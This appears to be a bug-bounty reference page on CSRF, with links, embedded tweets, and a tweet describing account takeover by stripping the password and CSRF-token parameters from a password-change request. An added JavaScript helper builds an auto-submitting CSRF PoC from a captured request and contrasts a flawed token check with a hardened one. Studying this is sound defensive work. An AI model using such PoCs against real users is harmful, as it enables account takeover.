# Cross Site Request Forgery (CSRF)

**Blog / Articles:**

* <http://blog.opensecurityresearch.com/2012/02/json-csrf-with-parameter-padding.html>
* <https://labs.detectify.com/2017/03/15/loginlogout-csrf-time-to-reconsider/>
* <https://medium.com/@secureITmania/how-i-exploit-the-json-csrf-with-method-override-technique-71c0a9a7f3b0>
* <https://medium.com/@zseano/site-wide-csrf-issue-chained-with-clickjacking-multiple-sites-vulnerable-6201abab0d3e>
* <https://blog.securityinnovation.com/seven-sins-of-anti-csrf-tokens>
* <https://medium.com/bugbountywriteup/lets-bypass-csrf-protection-password-confirmation-to-takeover-victim-accounts-d-4a21297847ff>

**Bypasses / Cheatsheets:**

![https://twitter.com/hackerscrolls/status/1265217322308046849](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MIQ8_-xxD4s3lnOt_-m%2F-MIQ95wLAXE9M__Z6JNZ%2Fimage.png?alt=media\&token=5170f918-49e3-49ed-94db-8382d1aed7be)

{% file src="<https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MIPv_ZyJiFJxuzJVZnw%2F-MIQ8VN_-wACse--5jeu%2Fscreencapture-web-archive-org-web-20170330124956-http-zseano-com-tut-5-html-2020-09-30-00_04_31.pdf?alt=media&token=a002440a-f287-4765-91b0-30871b781f3b>" %}

* <https://trustfoundry.net/cross-site-request-forgery-cheat-sheet/>

**CSRF MindMap:**

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MIQA6ky4JDZo8h0tVQb%2F-MIQAMy82uFSAwsyQvkj%2Fimage.png?alt=media\&token=396fce99-59fc-42d8-aac7-6ab7f1cc260c)

**Videos:**

* <https://www.youtube.com/watch?v=eWEgUcHPle0>
* <https://www.youtube.com/watch?v=ULvf6N8AL2A&feature=youtu.be>

{% embed url="<https://twitter.com/jae_hak99/status/1335192935197917185>" %}

![](https://3284959579-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-LmdDaax1PAvLD05wJYt%2F-MWEPDycqJPrnCVJNq2M%2F-MWEPcBVpp_kW_FNRs7J%2Fimage.png?alt=media\&token=c3c46aec-b087-43cc-8aae-2173570bba65)

ATO using CSRF: Account settings, password change option. We need the current password to set a new password. Capture the request, remove the current password and CSRF-Token parameters. Generate a CSRF PoC. Send it to the victim, and the victim's password gets changed. [#bugbountytips](https://twitter.com/hashtag/bugbountytips?src=hashtag_click) [#BugBounty](https://twitter.com/hashtag/BugBounty?src=hashtag_click)
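The procedure in the tweet above, as an added example (this is not code from the original page or from the tweet's author): a small Node helper that takes a captured password-change request body, strips the current-password and anti-CSRF-token parameters, and emits the auto-submitting HTML PoC you would host and send to the victim. It also includes a minimal model of the server-side mistake this bypass depends on, where the token is only compared when the field is present, next to the hardened form. The endpoint URL, the parameter names (`current_password`, `csrf_token`, and so on) and the captured body are all assumptions constructed for illustration.

```javascript
// Added example, not from the original page or the tweet's author.
// Builds an auto-submitting CSRF PoC from a captured password-change request,
// dropping the parameters the tweet says to remove. Endpoint and parameter
// names are assumptions for illustration only.

const TARGET = "https://target.example/account/password"; // assumed endpoint

// Parse a captured application/x-www-form-urlencoded body into ordered pairs.
function parseFormBody(body) {
  return body
    .split("&")
    .filter(Boolean)
    .map((pair) => {
      const [k, v = ""] = pair.split("=");
      const dec = (s) => decodeURIComponent(s.replace(/\+/g, " "));
      return [dec(k), dec(v)];
    });
}

// Remove the parameters the target is assumed not to enforce when absent
// (the current password and the anti-CSRF token).
function stripParams(pairs, names) {
  const drop = new Set(names);
  return pairs.filter(([k]) => !drop.has(k));
}

// Escape a value for safe placement inside an HTML attribute.
function escapeAttr(s) {
  return s
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Emit the PoC page: a hidden form that submits itself on load, so a victim
// who is logged in to the target sends the request with their session cookie.
function buildCsrfPoc(action, pairs) {
  const inputs = pairs
    .map(([k, v]) => `    <input type="hidden" name="${escapeAttr(k)}" value="${escapeAttr(v)}">`)
    .join("\n");
  return [
    "<!DOCTYPE html>",
    "<html><body>",
    `  <form id="csrf" method="POST" action="${escapeAttr(action)}">`,
    inputs,
    "  </form>",
    "  <script>document.getElementById('csrf').submit();</script>",
    "</body></html>",
  ].join("\n");
}

// Assumed model of the server-side bug the bypass relies on: the token is
// validated only when the csrf_token field is present, so omitting it passes.
function vulnerableTokenCheck(pairs, sessionToken) {
  const sent = pairs.find(([k]) => k === "csrf_token");
  return sent === undefined || sent[1] === sessionToken;
}

// Hardened check: a missing token is a failure, not a pass.
function hardenedTokenCheck(pairs, sessionToken) {
  const sent = pairs.find(([k]) => k === "csrf_token");
  return sent !== undefined && sent[1] === sessionToken;
}

// Constructed sample of a captured request body (not real data).
const CAPTURED =
  "current_password=OldPass1&new_password=Pwned123%21&confirm_password=Pwned123%21&csrf_token=abc123";

// Run the whole procedure and return everything worth inspecting.
function demo() {
  const pairs = stripParams(parseFormBody(CAPTURED), ["current_password", "csrf_token"]);
  return {
    html: buildCsrfPoc(TARGET, pairs),
    keys: pairs.map(([k]) => k),
    vulnerableAccepts: vulnerableTokenCheck(pairs, "abc123"),
    hardenedAccepts: hardenedTokenCheck(pairs, "abc123"),
  };
}

if (typeof require !== "undefined" && require.main === module) {
  console.log(demo().html);
}
```

Run it with `node poc.js > poc.html` and open the page while logged in to a test instance: if the password changes with no current password and no token in the request, the server is doing the check modelled by `vulnerableTokenCheck`. The hardened variant is what you want the fix to look like, and it should be paired with a `SameSite` cookie attribute so the form post is not sent with the session cookie at all.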

{% embed url="<https://twitter.com/hakluke/status/1350710129671344128?s=20>" %}

{% embed url="<https://twitter.com/Devil79830787/status/1472984805293760514?s=20>" %}
